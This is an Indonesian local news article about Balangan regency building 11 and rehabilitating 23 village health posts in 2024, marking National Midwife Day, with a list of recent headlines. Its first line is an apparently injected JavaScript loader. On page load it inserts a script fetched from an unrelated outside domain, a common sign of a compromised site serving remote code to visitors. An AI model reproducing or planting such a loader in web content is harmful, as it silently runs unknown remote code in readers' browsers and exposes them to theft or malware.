(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Wujudkan Balangan Sehat, 2024 Pemkab Bangun 11 dan Rehab 23 Poskesdes


KANALKALIMANTAN.COM, PARINGIN – Kehadiran bidan di desa mampu memperluas jangkuan pelayanan kebidanan dan kesehatan anak. Bidan juga melakukan promosi kesehatan dan pencegahan penyakit pada bayi.

Bidan adalah role model masyarakat, konselor, motivator dan inovator di daerah terpencil.

Taufiqurrahman, Kepala Bagian Administrasi Pembangunan Setda Kabupaten Balangan, mengatakan, bidan sebagai pelaksana pelayanan kesehatan di lini depan di desa, membaur dengan masyarakat, tentunya harus disediakan prasarana yang memadai sebagai tempat tinggal dalam melaksanakan tugasnya.

“Polindes (Pondok Bersalin Desa) ataupun Poskesdes (Pos Kesehatan Desa) ialah fasilitas layanan kesehatan  dasar, ditempati bidan yang memiliki peran penting  pelayanan kesehatan masyarakat di wilayah desanya,” ujarnya, Selasa (25/6/2024).

Baca juga: Beri Apresiasi Relawan Damkar, Aditya Serahkan Pemadam Portable dan Penghargaan

Menurutnya, hampir seluruh desa di Kabupaten Balangan telah memiliki Poskesdes. Saat ini, tepatnya berjumlah 143 unit Poskesdes.

“Pada tahun 2024, Pemerintah Kabupaten Balangan melalui Dinas Kesehatan membangun 11 unit Poskesdes, direncanakan berlokasi diantaranya di Desa Batumandi, Lampihong Kanan, Piyait, Simpang Bumbuan, dan Ambakiang. Ini termasuk relokasi Poskesdes di Desa Sungai Tabuk, Auh, dan Kusambi Hilir,” sebutnya.

Kemudian juga menambah ruang Poskesdes di Desa Murung Abuin agar lebih layak. Tak ketinggalan menyelesaikan pembangunan Poskesdes di desa Simpang Tiga dan desa Bungur.

Selain itu akan direhab 23 Poskesdes yang tersebar di desa Gunung Riut, Bakung, Tanah Habang, Pudak, Puyun, Jungkal, Kandang Jaya, Mauya, Teluk Bayur, Kaladan, Langkap, Sungai Hanyar, Tampang, Halubau, Sumber Rezeki, Lingsir, Binuang Santang, Mamantang, Layap dan Mantuyan. Juga direhab fasilitas yang berada di desa Bihara Hilir, Papuyuan, dan Baruh Bahinu Dalam.

Baca juga: Sidang Kasus Tawuran Geng Remaja di Banjarbaru, Hukuman Terjelek Bisa di Lapas atau Panti Sosial

Dia mengharapkan dengan pembangunan dan rehabilitasi bangunan Poskesdes ini, para bidan desa tetap ikhlas mengabdi dan menjalankan profesinya.

“Selamat Hari Bidan Nasional 24 Juni 2024.Terimakasih untuk seluruh bidan. Terima kasih atas cinta kasihnya untuk mewujudkan Balangan Sehat,” tutupnya. (Kanalkalimantan.com/mcbalangan)

Reporter  : mcbalangan
Editor : kk


Risa

Recent Posts

Banjir Rob Murung Selong Banjarmasin 407 Jiwa Terdampak

KANALKALIMANTAN.COM, BANJARMASIN - Banjir rob yang menggenangi kawasan Murung Selong, Kelurahan Sungai Lulut, Kota Banjarmasin,… Read More

11 jam ago

Tanggul Halangi Air Keluar di Komplek PWI, Ketua DPRD Banjarmasin Minta Dibongkar

KANALKALIMANTAN.COM, BANJARMASIN - Ketua DPRD Kota Banjarmasin, Rikval Fachruri meninjau banjir rob di komplek Persatuan… Read More

11 jam ago

Banjir di Gang Serumpun Sungai Lulut Masih Selutut

KANALKALIMANTAN.COM, BANJARMASIN — Banjir rob yang menggenangi Jalan Hikmah Banua, Gang Serumpun RT 27, Kelurahan… Read More

13 jam ago

BLK Kalsel Buka Pendaftaran Pelatihan Kerja Tahun 2026

KANALKALIMANTAN.COM, BANJARBARU - Balai Latihan Kerja (BLK) di bawah Dinas Tenaga Kerja dan Transmigrasi (Disnakertrans)… Read More

17 jam ago

Besok, Presiden RI Resmikan 166 Sekolah Rakyat Terpadu di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru bersiap menyambut kunjungan Presiden Republik Indonesia, Prabowo Subianto berserta… Read More

19 jam ago

Remaja 13 Tahun Terseret Arus di Sungai Martapura

KANALKALIMANTAN.COM, BANJARMASIN — Seorang remaja laki-laki dilaporkan tenggelam di Sungai Martapura, Jalan Rantauan Darat, Kecamatan… Read More

1 hari ago

This website uses cookies.